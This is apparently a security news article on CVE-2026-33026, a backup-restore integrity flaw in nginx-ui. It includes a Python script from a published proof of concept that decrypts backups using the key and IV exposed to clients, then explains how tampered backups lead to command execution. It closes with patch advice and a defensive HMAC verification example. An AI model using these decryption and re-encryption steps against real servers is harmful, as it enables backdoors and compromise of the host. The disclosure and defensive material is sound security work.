GBHackers

PoC Exploit Code Published for nginx-ui Backup Restore Security Flaw


A critical security flaw in the nginx-ui backup restore mechanism, tracked as CVE-2026-33026, allows attackers to manipulate encrypted backups and execute arbitrary commands.

Proof-of-Concept (PoC) exploit code has been publicly released, prompting an urgent need for administrators to update to version 2.3.4.

Backup Integrity Bypass Flaw

The vulnerability stems from a circular trust model where the backup format lacks a secure integrity root.

import os
import zipfile
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad


def decrypt_aes_cbc(encrypted_data, key_b64, iv_b64):
    # Key and IV arrive base64-encoded inside the security token the
    # application hands to the client alongside the backup.
    key = base64.b64decode(key_b64)
    iv = base64.b64decode(iv_b64)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(encrypted_data)
    return unpad(decrypted, AES.block_size)


def decrypt_backup(file_path, output_dir, key_b64, iv_b64):
    # Outer archive is a plain zip; the three members inside are AES-CBC encrypted.
    with zipfile.ZipFile(file_path, 'r') as main_zip:
        main_zip.extractall(output_dir)

    files_to_decrypt = ["hash_info.txt", "nginx-ui.zip", "nginx.zip"]

    for filename in files_to_decrypt:
        path = os.path.join(output_dir, filename)
        if os.path.exists(path):
            with open(path, "rb") as f:
                encrypted = f.read()

            decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)

            out_path = path + ".decrypted"
            with open(out_path, "wb") as f:
                f.write(decrypted)
            print(f"[*] Successfully decrypted: {out_path}")

The application hands the AES encryption key and Initialization Vector (IV) directly to the client as a security token; that same key encrypts both the backup data and the integrity metadata, as reported by security researcher 0xJacky.

Attackers can use this token to decrypt the archive, alter configuration files, update the SHA-256 hashes, and re-encrypt the bundle for restoration.

Generate a backup and extract the security token (Source: Github)

Because the restore process accepts the modified integrity metadata generated by the attacker, malicious configurations are seamlessly applied to the server environment.

This manipulation grants threat actors the ability to insert backdoors and achieve arbitrary command execution on the host machine.

The exploit operates silently regardless of hash mismatches, potentially leading to a complete compromise of the nginx-ui deployment.

The system accepts the modified backup (Source: Github)

Administrators must immediately upgrade their nginx-ui installations to the patched version 2.3.4 to secure their infrastructure.

Developers are advised to introduce a trusted integrity root, such as signing backup metadata using a server-side private key rather than client-exposed tokens.

Furthermore, enforcing strict server-side integrity verification during the restore process will prevent attacker-controlled data from being processed entirely.
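The two recommendations above (a trusted integrity root on the metadata, plus strict server-side verification on restore) can be illustrated side by side. The following is an added example written for this article, not code from nginx-ui or from the PoC: it models the backup as a small dictionary of constructed file contents, uses an HMAC-SHA256 tag under a hypothetical server-only secret as a stand-in for the server-side signature, and contrasts a restore that trusts client-supplied hashes with one that checks the server tag first.

```python
import hashlib
import hmac
import json

# Constructed sample backup contents (not a real nginx-ui backup): member name -> bytes.
SAMPLE_FILES = {
    "nginx-ui.zip": b"app-settings-v1",
    "nginx.zip": b"server { listen 80; }",
}

# Hypothetical server-only secret. The point of the fix is that this value is
# never part of the token handed to the client, so the client cannot forge tags.
SERVER_SECRET = b"server-side-secret-that-never-leaves-the-host"


def build_hash_info(files):
    """Per-file SHA-256 digests: the metadata anyone holding the token can regenerate."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in sorted(files.items())}


def canonical(hash_info):
    """Deterministic serialization so signer and verifier MAC identical bytes."""
    return json.dumps(hash_info, sort_keys=True, separators=(",", ":")).encode()


def sign_metadata(hash_info, secret=SERVER_SECRET):
    """Server-side integrity root: HMAC-SHA256 over the canonical metadata."""
    return hmac.new(secret, canonical(hash_info), hashlib.sha256).hexdigest()


def restore_trusting_client(files, hash_info):
    """Circular trust model: the hashes come from the client-held bundle itself,
    so a bundle whose hashes were recomputed after editing still passes."""
    return build_hash_info(files) == hash_info


def restore_with_integrity_root(files, hash_info, tag, secret=SERVER_SECRET):
    """Hardened restore: verify the server tag before touching any file hashes,
    and only then confirm every member matches the signed metadata."""
    expected = sign_metadata(hash_info, secret)
    if not hmac.compare_digest(expected, tag):
        return False  # metadata was not produced by this server
    return build_hash_info(files) == hash_info


def tampered_bundle(files):
    """Constructed scenario: one member is edited and hash_info regenerated,
    which is exactly what the exposed token allows a client to do."""
    modified = dict(files)
    modified["nginx.zip"] = b"server { listen 80; } # edited after backup"
    return modified, build_hash_info(modified)


def demo():
    """Run both restore checks against the original and the tampered bundle."""
    hash_info = build_hash_info(SAMPLE_FILES)
    tag = sign_metadata(hash_info)  # produced server-side at backup time
    edited_files, edited_hash_info = tampered_bundle(SAMPLE_FILES)
    return {
        "legit_weak": restore_trusting_client(SAMPLE_FILES, hash_info),
        "legit_hardened": restore_with_integrity_root(SAMPLE_FILES, hash_info, tag),
        "tampered_weak": restore_trusting_client(edited_files, edited_hash_info),
        "tampered_hardened": restore_with_integrity_root(edited_files, edited_hash_info, tag),
    }


if __name__ == "__main__":
    for check, accepted in demo().items():
        print(f"{check}: {'accepted' if accepted else 'rejected'}")
```

The weak check accepts the edited bundle because the only thing it compares against is metadata the client was able to rewrite; the hardened check rejects it because the server tag was computed over the original hash_info and the client holds no secret with which to recompute it. A real deployment would use an asymmetric signature or a KMS-held key rather than an in-process constant, but the trust boundary is the same: the verifier's key material must not travel with the backup.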
